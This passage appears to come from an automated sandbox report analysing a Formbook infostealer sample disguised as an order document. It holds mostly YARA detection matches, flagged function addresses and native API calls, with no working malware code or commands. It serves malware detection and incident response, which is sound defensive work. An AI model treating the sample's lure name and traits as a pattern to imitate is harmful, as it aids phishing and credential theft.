Source: 0.2.Order No00020212910.exe.3cffe30.2.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.360093784.00000000012A0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.360093784.00000000012A0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.358557026.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.358557026.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.359113486.0000000000F30000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.359113486.0000000000F30000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.286837768.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.286837768.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.538894457.0000000002DB0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.538894457.0000000002DB0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000000.331858706.000000000FC45000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000000.331858706.000000000FC45000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.538763652.0000000002D80000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.538763652.0000000002D80000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.290527525.0000000003BD9000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.290527525.0000000003BD9000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.537812655.0000000000B10000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.537812655.0000000000B10000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000000.317344096.000000000FC45000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000000.317344096.000000000FC45000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.287427426.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.287427426.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: Order No00020212910.exe
Yara signature match
Source: 5.0.Order No00020212910.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.Order No00020212910.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.Order No00020212910.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.Order No00020212910.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.Order No00020212910.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.Order No00020212910.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.Order No00020212910.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.Order No00020212910.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.Order No00020212910.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.Order No00020212910.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.Order No00020212910.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.Order No00020212910.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.Order No00020212910.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.Order No00020212910.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Order No00020212910.exe.3cffe30.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.Order No00020212910.exe.3cffe30.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.360093784.00000000012A0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.360093784.00000000012A0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.358557026.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.358557026.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.359113486.0000000000F30000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.359113486.0000000000F30000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.286837768.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.286837768.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.538894457.0000000002DB0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.538894457.0000000002DB0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000000.331858706.000000000FC45000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000000.331858706.000000000FC45000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.538763652.0000000002D80000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.538763652.0000000002D80000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.290527525.0000000003BD9000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.290527525.0000000003BD9000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.537812655.0000000000B10000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.537812655.0000000000B10000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000000.317344096.000000000FC45000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000000.317344096.000000000FC45000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.287427426.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.287427426.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Detected potential crypto function
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 0_2_008C7EF8 0_2_008C7EF8
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 0_2_02B8C3BC 0_2_02B8C3BC
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 0_2_02B8E330 0_2_02B8E330
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 0_2_02B8E32B 0_2_02B8E32B
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 0_2_076C7D88 0_2_076C7D88
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 0_2_076C7A28 0_2_076C7A28
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 0_2_076CA268 0_2_076CA268
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 0_2_076CA258 0_2_076CA258
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 0_2_076CA008 0_2_076CA008
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 0_2_076CA018 0_2_076CA018
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 0_2_076C7D77 0_2_076C7D77
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 0_2_076C5BE2 0_2_076C5BE2
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 0_2_076C5BF0 0_2_076C5BF0
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 0_2_076C7A18 0_2_076C7A18
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_0040102A 5_2_0040102A
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00401030 5_2_00401030
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_0041C16A 5_2_0041C16A
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_0041C97E 5_2_0041C97E
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_0041BCEC 5_2_0041BCEC
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00408C8B 5_2_00408C8B
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00408C90 5_2_00408C90
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00402D87 5_2_00402D87
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00402D90 5_2_00402D90
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00402FB0 5_2_00402FB0
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_0041CFB1 5_2_0041CFB1
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00527EF8 5_2_00527EF8
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FC20A0 5_2_00FC20A0
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FAB090 5_2_00FAB090
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FBA830 5_2_00FBA830
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01051002 5_2_01051002
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_0106E824 5_2_0106E824
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FB99BF 5_2_00FB99BF
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_010620A8 5_2_010620A8
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FB4120 5_2_00FB4120
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_010628EC 5_2_010628EC
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00F9F900 5_2_00F9F900
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01062B28 5_2_01062B28
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_0103CB4F 5_2_0103CB4F
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FBB236 5_2_00FBB236
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_0105DBD2 5_2_0105DBD2
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_010503DA 5_2_010503DA
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_010423E3 5_2_010423E3
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FCABD8 5_2_00FCABD8
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_0104FA2B 5_2_0104FA2B
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FCEBB0 5_2_00FCEBB0
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FBEB9A 5_2_00FBEB9A
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FC138B 5_2_00FC138B
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_010622AE 5_2_010622AE
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FBAB40 5_2_00FBAB40
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01054AEF 5_2_01054AEF
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FBA309 5_2_00FBA309
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01062D07 5_2_01062D07
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01061D55 5_2_01061D55
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01052D82 5_2_01052D82
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FBB477 5_2_00FBB477
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_010625DD 5_2_010625DD
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FA841F 5_2_00FA841F
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FAD5E0 5_2_00FAD5E0
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_0105D466 5_2_0105D466
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FC2581 5_2_00FC2581
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01054496 5_2_01054496
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00F90D20 5_2_00F90D20
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_0106DFCE 5_2_0106DFCE
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FB6E30 5_2_00FB6E30
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01061FF1 5_2_01061FF1
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00FB5600 5_2_00FB5600
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_0105D616 5_2_0105D616
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01041EB6 5_2_01041EB6
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_01062EF7 5_2_01062EF7
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_0382138B 14_2_0382138B
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_0382EBB0 14_2_0382EBB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_038B03DA 14_2_038B03DA
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_038BDBD2 14_2_038BDBD2
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_0382ABD8 14_2_0382ABD8
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_038A23E3 14_2_038A23E3
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_0381A309 14_2_0381A309
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_038C2B28 14_2_038C2B28
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_0381AB40 14_2_0381AB40
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_0389CB4F 14_2_0389CB4F
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_038C22AE 14_2_038C22AE
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_038B4AEF 14_2_038B4AEF
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_038AFA2B 14_2_038AFA2B
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_0381B236 14_2_0381B236
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_038199BF 14_2_038199BF
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_037FF900 14_2_037FF900
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_03814120 14_2_03814120
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_0380B090 14_2_0380B090
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_038220A0 14_2_038220A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_038C20A8 14_2_038C20A8
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_038C28EC 14_2_038C28EC
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_038B1002 14_2_038B1002
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_038CE824 14_2_038CE824
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_0381A830 14_2_0381A830
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_038CDFCE 14_2_038CDFCE
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_038C1FF1 14_2_038C1FF1
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_038C2EF7 14_2_038C2EF7
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_038BD616 14_2_038BD616
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_03816E30 14_2_03816E30
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_03822581 14_2_03822581
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_038B2D82 14_2_038B2D82
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_038C25DD 14_2_038C25DD
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_037F0D20 14_2_037F0D20
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_0380D5E0 14_2_0380D5E0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_038C2D07 14_2_038C2D07
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_038C1D55 14_2_038C1D55
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_038B4496 14_2_038B4496
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_0380841F 14_2_0380841F
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_038BD466 14_2_038BD466
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_0381B477 14_2_0381B477
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_00B2C97E 14_2_00B2C97E
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_00B18C90 14_2_00B18C90
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_00B18C8B 14_2_00B18C8B
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_00B2BCEC 14_2_00B2BCEC
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_00B12D90 14_2_00B12D90
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_00B12D87 14_2_00B12D87
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_00B12FB0 14_2_00B12FB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 14_2_00B2CFB1 14_2_00B2CFB1
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: String function: 037FB150 appears 136 times
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: String function: 00F9B150 appears 145 times
Contains functionality to call native functions
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_004185F0 NtCreateFile, 5_2_004185F0
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_004186A0 NtReadFile, 5_2_004186A0
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00418720 NtClose, 5_2_00418720
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_004187D0 NtAllocateVirtualMemory, 5_2_004187D0
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_004185EB NtCreateFile, 5_2_004185EB
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_00418643 NtCreateFile, 5_2_00418643
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_0041869A NtReadFile, 5_2_0041869A
Source: C:\Users\user\Desktop\Order No00020212910.exe Code function: 5_2_0041871A NtClose, 5_2_0041871A
